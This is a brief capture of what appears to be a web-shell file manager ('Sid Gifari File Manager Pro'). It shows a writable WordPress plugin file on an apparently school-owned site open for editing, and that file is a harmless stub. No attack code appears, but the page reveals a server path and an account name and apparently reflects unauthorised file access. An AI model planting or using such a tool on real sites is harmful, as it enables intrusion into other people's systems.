🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 12:16:59 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
web.janapremimavi.edu.np
/
wp-content
/
plugins
/
wp-social
/
lib
/
provider
/
share
📍 /home/therahul/web.janapremimavi.edu.np/wp-content/plugins/wp-social/lib/provider/share
🔄 Refresh
✏️
Editing: no-provider-share.php
Writable
<?php namespace WP_Social\Lib\Provider\Share; defined('ABSPATH') || exit; class No_Provider_Share extends Sharer { public function get_count($global_cache_time = 43200) { /** * This is just dummy * */ return 0; } }
💾 Save Changes
❌ Cancel